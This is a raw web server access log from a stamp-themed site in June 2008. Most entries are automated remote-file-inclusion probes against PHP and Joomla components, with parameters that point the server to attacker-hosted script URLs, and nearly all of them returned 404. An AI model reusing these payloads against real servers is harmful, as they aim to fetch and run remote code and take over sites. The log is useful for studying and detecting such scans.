83.98.208.5 - - [15/Jun/2008:20:53:55 -0700] "GET /PHPDJ_v05/dj/djpage.php?page=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
83.98.208.5 - - [15/Jun/2008:20:53:55 -0700] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
64.27.83.240 - - [15/Jun/2008:20:54:28 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
64.27.83.240 - - [15/Jun/2008:20:54:28 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
64.27.83.240 - - [15/Jun/2008:20:54:28 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [15/Jun/2008:20:54:50 -0700] "GET /logs/access.log/index.php?redir=http://atapcastle.com/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [15/Jun/2008:20:54:51 -0700] "GET /index.php?redir=http://atapcastle.com/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [15/Jun/2008:20:54:51 -0700] "GET /logs/index.php?redir=http://atapcastle.com/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
195.32.96.7 - - [15/Jun/2008:20:54:54 -0700] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
195.32.96.7 - - [15/Jun/2008:20:54:56 -0700] "GET /PHPDJ_v05/dj/djpage.php?page=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
216.167.156.20 - - [15/Jun/2008:20:58:14 -0700] "GET /logs/access_080602.log/index.php?redir=http://atapcastle.com/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [15/Jun/2008:21:00:50 -0700] "GET /index.php?redir=http://atapcastle.com/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.129.72.52 - - [15/Jun/2008:21:01:14 -0700] "GET /logs/access.log/index.php?redir=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.86.129.164 - - [15/Jun/2008:21:01:17 -0700] "GET /logs/access_080526.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.129.72.52 - - [15/Jun/2008:21:01:19 -0700] "GET /logs/index.php?redir=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.56.189.33 - - [15/Jun/2008:21:03:23 -0700] "GET /logs/access_080602.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.189.33 - - [15/Jun/2008:21:03:24 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.189.33 - - [15/Jun/2008:21:03:29 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:21:04:04 -0700] "GET /logs/access_080616.log HTTP/1.1" 200 5490557 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
217.129.72.52 - - [15/Jun/2008:21:05:43 -0700] "GET /logs/access_080602.log/index.php?redir=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.129.72.52 - - [15/Jun/2008:21:06:09 -0700] "GET /index.php?redir=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.56.189.33 - - [15/Jun/2008:21:07:32 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:21:08:44 -0700] "GET /logs/access_080512.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:21:08:45 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:21:08:45 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:21:08:51 -0700] "GET /logs/?S=A HTTP/1.0" 200 7929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.55.76.110 - - [15/Jun/2008:21:08:53 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.55.76.110 - - [15/Jun/2008:21:08:53 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.55.76.110 - - [15/Jun/2008:21:08:53 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:21:10:29 -0700] "GET /logs/access_080616.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.55.76.110 - - [15/Jun/2008:21:10:59 -0700] "GET /logs/access_080602.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:21:12:27 -0700] "GET /logs/access_080331.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:21:16:04 -0700] "GET /logs/access_080609.log HTTP/1.0" 200 5056968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
203.172.184.72 - - [15/Jun/2008:21:18:41 -0700] "GET /logs/access_080526.log//include/functions_common.php?gl_root_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.172.184.72 - - [15/Jun/2008:21:18:41 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:21:18:41 -0700] "GET //include/functions_common.php?gl_root_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:21:20:29 -0700] "GET /logs/access_080519.log HTTP/1.0" 200 5693247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
202.218.48.5 - - [15/Jun/2008:21:23:14 -0700] "GET /logs/errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
202.218.48.5 - - [15/Jun/2008:21:23:14 -0700] "GET /errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:21:32:55 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:21:32:55 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:21:32:55 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:21:32:55 -0700] "GET /logs/access_080526.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.56.189.33 - - [15/Jun/2008:21:37:53 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.225.240.235 - - [15/Jun/2008:21:40:55 -0700] "GET /secure.php?&cfgProgDir=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.174.65.190 - - [15/Jun/2008:21:43:23 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:21:46:08 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:21:46:08 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.225.240.235 - - [15/Jun/2008:21:53:19 -0700] "GET /logs/access.log/secure.php?&cfgProgDir=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.225.240.235 - - [15/Jun/2008:21:53:19 -0700] "GET /logs/secure.php?&cfgProgDir=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.140.181.20 - - [15/Jun/2008:21:55:19 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.140.181.20 - - [15/Jun/2008:21:55:19 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.140.181.20 - - [15/Jun/2008:21:55:20 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.225.240.235 - - [15/Jun/2008:21:57:11 -0700] "GET /logs/access_080310.log/secure.php?&cfgProgDir=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.174.65.190 - - [15/Jun/2008:22:10:05 -0700] "GET /logs/access_080310.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
81.174.65.190 - - [15/Jun/2008:22:10:05 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.110.101.219 - - [15/Jun/2008:22:14:56 -0700] "GET /logs/access_080526.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vaterhaus.de/LIESMICH.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
212.110.101.219 - - [15/Jun/2008:22:14:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vaterhaus.de/LIESMICH.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
212.110.101.219 - - [15/Jun/2008:22:14:56 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vaterhaus.de/LIESMICH.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:22:21:55 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:24:54 -0700] "GET /logs/access_080519.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:24:54 -0700] "GET /links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:25:05 -0700] "GET /logs/access_080505.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:25:08 -0700] "GET /logs/access_080519.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:25:08 -0700] "GET /links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
212.110.101.219 - - [15/Jun/2008:22:25:16 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vaterhaus.de/LIESMICH.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:25:29 -0700] "GET /logs/access_080505.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:26:35 -0700] "GET /links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:22:27:20 -0700] "GET /logs/access_080512.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:27:34 -0700] "GET /links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:29:52 -0700] "GET /logs/access_080505.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:29:53 -0700] "GET /links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:29:53 -0700] "GET /logs/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.34.140.215 - - [15/Jun/2008:22:32:34 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.34.140.215 - - [15/Jun/2008:22:32:34 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.210.190.242 - - [15/Jun/2008:22:32:43 -0700] "GET /logs/access_080519.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:35:19 -0700] "GET /logs/access_080505.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:35:20 -0700] "GET /links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:35:20 -0700] "GET /logs/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.86.5.10 - - [15/Jun/2008:22:36:00 -0700] "GET /logs/index3.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
70.86.5.10 - - [15/Jun/2008:22:36:00 -0700] "GET /index3.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
221.143.46.190 - - [15/Jun/2008:22:36:37 -0700] "GET /logs/access_080428.log/links/index.php?path[docroot]=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.54.22.2 - - [15/Jun/2008:22:38:37 -0700] "GET /index3.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
74.54.22.2 - - [15/Jun/2008:22:38:37 -0700] "GET /logs/index3.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
85.214.115.47 - - [15/Jun/2008:22:38:43 -0700] "GET /logs/access_080526.log/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.115.47 - - [15/Jun/2008:22:38:44 -0700] "GET /bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.115.47 - - [15/Jun/2008:22:38:44 -0700] "GET /logs/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:39:04 -0700] "GET /logs/scripts.log/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:39:04 -0700] "GET /infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:39:04 -0700] "GET /logs/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:22:39:08 -0700] "GET /logs/scripts.log/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:22:39:09 -0700] "GET /infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:22:39:09 -0700] "GET /logs/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
209.25.221.108 - - [15/Jun/2008:22:39:29 -0700] "GET /logs/access_080526.log/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.25.221.108 - - [15/Jun/2008:22:39:29 -0700] "GET /bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.25.221.108 - - [15/Jun/2008:22:39:29 -0700] "GET /logs/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:39:33 -0700] "GET /logs/access_080526.log/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:39:33 -0700] "GET /bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:39:33 -0700] "GET /logs/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:40:16 -0700] "GET /logs/scripts.log/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:40:17 -0700] "GET /infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:40:17 -0700] "GET /logs/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:22:41:00 -0700] "GET /logs/access_080526.log/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:22:41:00 -0700] "GET /bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:22:41:00 -0700] "GET /logs/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.86.91.115 - - [15/Jun/2008:22:43:44 -0700] "GET /logs/access_080526.log/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [15/Jun/2008:22:43:44 -0700] "GET /bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [15/Jun/2008:22:43:45 -0700] "GET /logs/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:22:43:53 -0700] "GET /logs/scripts.log/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:22:43:53 -0700] "GET /infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:22:43:53 -0700] "GET /logs/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:44:03 -0700] "GET /logs/scripts.log/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:44:03 -0700] "GET /infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:44:03 -0700] "GET /logs/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
